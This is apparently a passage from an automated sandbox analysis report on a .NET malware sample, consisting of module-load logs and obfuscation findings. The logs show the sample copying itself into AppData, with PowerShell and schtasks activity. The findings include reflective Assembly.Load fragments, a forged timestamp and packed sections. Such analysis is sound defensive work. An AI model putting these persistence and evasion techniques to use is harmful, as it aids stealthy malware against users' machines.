Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\9nvo2o410p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\9nvo2o410p.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 9nvo2o410p.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 9nvo2o410p.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 9nvo2o410p.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: jkfw.pdb source: 9nvo2o410p.exe, FAwLPzxPWWF.exe.0.dr
Source: Binary string: jkfw.pdbSHA256 source: 9nvo2o410p.exe, FAwLPzxPWWF.exe.0.dr

Data Obfuscation

barindex
Source: 0.2.9nvo2o410p.exe.3e70f90.4.raw.unpack, iM.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs .Net Code: rMXrXAaUUQ System.Reflection.Assembly.Load(byte[])
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs .Net Code: rMXrXAaUUQ System.Reflection.Assembly.Load(byte[])
Source: 9nvo2o410p.exe Static PE information: 0xFE984D00 [Sun May 10 10:20:48 2105 UTC]
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757A7D9 push eax; iretd 0_2_0757A7DA
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757A21F push eax; iretd 0_2_0757A220
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B086FF pushfd ; retf 8_2_06B08702
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B01810 push es; ret 8_2_06B01820
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_07526BDF push dword ptr [esp+ecx*2-75h]; ret 8_2_07526BE3
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_07527A3B push FFFFFF8Bh; retf 8_2_07527A3D
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_0132F530 pushfd ; iretd 10_2_0132F531
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056EBF33 push edx; ret 10_2_056EBF36
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065CE5CF push es; ret 16_2_065CE5E0
Source: 9nvo2o410p.exe Static PE information: section name: .text entropy: 7.973527237183905
Source: FAwLPzxPWWF.exe.0.dr Static PE information: section name: .text entropy: 7.973527237183905
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, dJg5V9sLrkK3OMV4dNX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iSJ7fuFPYa', 'Tnr7qDOhdx', 'zEn7TKF4Av', 'eas7eqmOp7', 'Rso7bd3FFx', 'tGg7ukd6GQ', 'oun7yCdYPw'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs High entropy of concatenated method names: 'WZLLSZw9u9', 'lTxLYsRQZR', 'woxLvFZ9Wh', 'JjKLi0xQTX', 'i1ILgV4L3M', 'eSHL0KIHDe', 'h3lLCRPCnt', 'qR9LjNBZEy', 'WEmLQoAEn3', 'tdLLNN3DoX'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, dSiIGkvGHM85O3iYLL.cs High entropy of concatenated method names: 'Dispose', 'bPysd00Zks', 'JEihOV41vq', 'yhOMMVouQf', 'q8psoJuWf0', 'YKNszVPP9X', 'ProcessDialogKey', 'ocmhwrG78B', 'eL9hsgwKtE', 'GNYhhHcLar'
